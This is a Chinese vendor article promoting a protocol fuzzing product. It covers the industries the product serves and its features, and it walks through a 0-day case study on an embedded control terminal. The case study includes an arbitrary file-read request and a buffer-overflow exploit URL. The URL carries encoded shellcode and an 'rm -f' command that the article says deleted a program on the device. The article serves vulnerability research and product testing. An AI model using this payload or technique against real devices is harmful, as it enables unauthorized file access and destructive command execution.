产品分享|0DAY漏洞挖掘利器-安般易侦协议模糊测试系统

640.gif


一、产品介绍

易侦协议模糊测试系统是一款通用的自动化黑盒模糊测试工具,能够高效发现协议相关的漏洞或缺陷。通过用例库可以快速进入测试环节,也支持自定义协议模板进行变异,并提供丰富的日志,精准定位测试对象的错误现场,出具详尽的测试报告,帮助企业更高效的发现和修复软件中的安全漏洞或缺陷,提升软件质量。


640.jpeg



二、适用行业及目标场景

1.适用行业


汽车:某车企使用易侦对汽车进行CAN总线协议模糊测试。

640.webp


电力:某电科院使用易侦对电力设备进行IEC61850-SV协议模糊测试。

640 (1).webp


工控:某工控单位使用易侦对工控设备进行IEC104协议模糊测试。

640 (2).webp


军工:某军工单位使用易侦对嵌入式武器装备进行未知协议逆向和模糊测试。

640 (3).webp


医疗:某医疗器械检测中心使用易侦对医疗设备进行自定义协议模糊测试。

640 (4).webp


通信:某通信单位使用易侦进行蓝牙协议模糊测试。

640 (5).webp


2.目标场景


  • 协议漏洞挖掘
    易侦可以自动化地向网络协议栈发送各种异常或非标准的协议数据包,以发现协议实现过程中的潜在漏洞。对于发现隐藏的缓冲区溢出、内存访问越界等类型的安全漏洞非常有效。


  • 网络设备、应用安全评估

   通过易侦可以评估网络设备(如路由器、交换机、防火墙等)对异常协议数据包的容错性,发现可能存在的安全缺陷,有助于提高网络设备的安全性。易侦也适用于Web应用程序、数据库系统等网络应用的安全评估,可以发现输入验证不当、协议解析错误等安全隐患。


  • 安全产品功能测试

   易侦可用于评估网络安全产品(如防火墙、IPS等)对异常协议数据包的处理能力,验证其安全防护功能。


  • 汽车合规测试

   在汽车行业中需全面覆盖车载系统的各类通信协议,通过易侦可以重点关注信息娱乐系统和车载网络安全等关键功能,以确保汽车产品在全球市场上的安全性和合规性。


  • 医疗器械出口合规测试
    不同国家和地区对于医疗器械的通信协议、网络安全、数据安全等方面都有专门的法规要求,易侦可以帮助客户确保产品能完全符合这些法规标准,通过监管部门的审核。



三、核心功能


01 内置用例库:支持一键使用内置用例,提高测试效率。


02 自定义协议报文结构:可定制协议报文变量,可配置变量类型、长度、字节顺序等属性。


03 自动生成模板:上传数据包对数据包中特定报文自动生成测试模板。


04 测试过程监控:提供实时的测试状态监控,如测试速率、测试用例总数、任务状态等。


05 目标状态检测:支持探测用例、ARP、TCP、UDP、ICMP等多种检测手段。


06 支持测试报告导出:支持PDF格式的测试报告在线预览与导出。


07 未知协议逆向分析:支持以抓包方式对未知协议进行逆向分析,继而进行模糊测试。



四、0day漏洞挖掘典型案例


1、基本信息

被测目标:某用户侧智能控制终端
测试工具:易侦协议模糊测试V4
测试协议套件:HTTP API


2、测试过程

将被测目标与易侦系统进行连接后,在易侦系统上创建测试任务,协议类型选择HTTP API。

640 (6).webp

将被测目标与易侦系统进行连接后,在易侦系统上创建测试任务,协议类型选择HTTP API。

640 (7).webp


3、测试结果

当易侦运行到第695条用例时,被测设备服务停止响应。易侦系统上显示状态异常,任务停止。

640 (8).webp


4、结果分析


发送报文:
GET/cgi-bin/list_file?dir=/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/\\/&down=1HTTP/1.1\r\nHost:192.168.110.253:12345\r\nCache-Control:max-age=0\r\nUpgrade-Insecure-Requests:1\r\nUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/99.0.4844.74Safari/537.36\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding:gzip,deflate\r\nAccept-Language:zh-CN,zh;q=0.9\r\nCookie:checkcode=N19J\r\nConnection:close\r\n\r


接收报文:HTTP/1.0502BadGateway\r\nDate:Thu,01Aug202407:21:02GMT\r\nServer:Boa/0.94.13\r\nConnection:close\r\nContent-Type:text/html;charset=ISO-8859-1\r\n\r\n502BadGateway\n

502BadGateway

\nTheCGIwasnotCGI/1.1 compliant.\n


结合易侦的日志可以看到接收内容中返回了502响应码,表示易侦发送的变异用例触发了该设备中某个缺陷,告知易侦接收到了无效的响应。


5、漏洞验证

在易侦测试中了解到某用户侧智能控制终端中存在缺陷,本次通过人工利用对该缺陷进行验证。


01 首先访问该设备的网页。

640 (9).webp


02 启动burpsuite进行抓包分析。

640 (10).webp

此时并未暴露很多接口。

640 (11).webp


03 通过用字典库去匹配和对页面的访问发现多个接口暴露情况。

640 (12).webp

观察到可以任意路径访问,判断可能存在漏洞。

640 (13).webp


04 在参数后面加down=1参数。

640 (16).webp

可以查看每个文件内容并进行读取。

640 (14).webp


6、漏洞利用

这里用burpsuite进行测试,执行删除addon程序命令,输入:


http://192.168.110.170:12345/cgi-bin/list_file?dir=%49%f2%3c%03%c0%f2%02%03%41%f2%a7%42%c0%f2%01%02%49%f2%47%01%c0%f2%02%01%0c%78%84%f0%61%04%0c%70%90%47aa%72%6d%20%2d%66%20addonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%19%90%02&down=1

640 (15).webp

结果证明成功删除了addon程序。

640.png


7、漏洞危害

经进一步验证得出该设备存在缓冲区溢出类型的漏洞,在list_file程序中对dir参数的过长输入并未严格过滤,产生缓冲区溢出造成可以任意命令执行,最终导致被测设备崩溃。